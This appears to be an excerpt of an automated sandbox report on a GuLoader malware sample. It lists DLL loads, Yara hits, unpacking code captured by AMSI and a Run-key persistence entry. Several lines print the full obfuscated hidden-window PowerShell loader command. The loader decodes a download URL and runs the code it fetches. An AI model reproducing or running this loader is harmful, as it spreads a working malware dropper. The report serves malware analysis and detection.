                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2000694205.0000000008910000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: msiexec.exe, 0000000E.00000002.2241394427.0000000002857000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*3 source: msiexec.exe, 0000000E.00000002.2241394427.000000000283A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xqm.Core.pdbol source: powershell.exe, 00000004.00000002.2000694205.0000000008910000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Yara detected GuLoader
                Source: Yara matchFile source: 00000004.00000002.2002956756.000000000D545000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2002636954.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1983290797.000000000606C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Prosected)$GlobAl:BiofOG = [sYsTeM.teXt.EnCOdInG]::aScIi.GeTstRING($veLuX)$GlObal:smMENe=$BIofog.subSTRing($Stes,$OveRcOnSumpTIon105)<#Morphography partiregnskab Pinnules Resupplies
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Edificant $Guldaldermaler $Styringsmidlets), (Nskerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Desillussioner = [AppDomain]::CurrentDomain.GetAssemb
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Autodidakter138)), $Quailed).DefineDynamicModule($Perruquier, $false).DefineType($Baedekers, $nonrecurrent, [System.MulticastDelegate]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Prosected)$GlobAl:BiofOG = [sYsTeM.teXt.EnCOdInG]::aScIi.GeTstRING($veLuX)$GlObal:smMENe=$BIofog.subSTRing($Stes,$OveRcOnSumpTIon105)<#Morphography partiregnskab Pinnules Resupplies
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP im
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbagJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A797B push ebx; retf 2_2_00007FFD9B8A796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A791E push ebx; retf 2_2_00007FFD9B8A796A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EAA70A pushfd ; iretd 4_2_04EAA731
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EAB260 pushad ; iretd 4_2_04EAB26A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GummicheckeneJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GummicheckeneJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004047CB
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
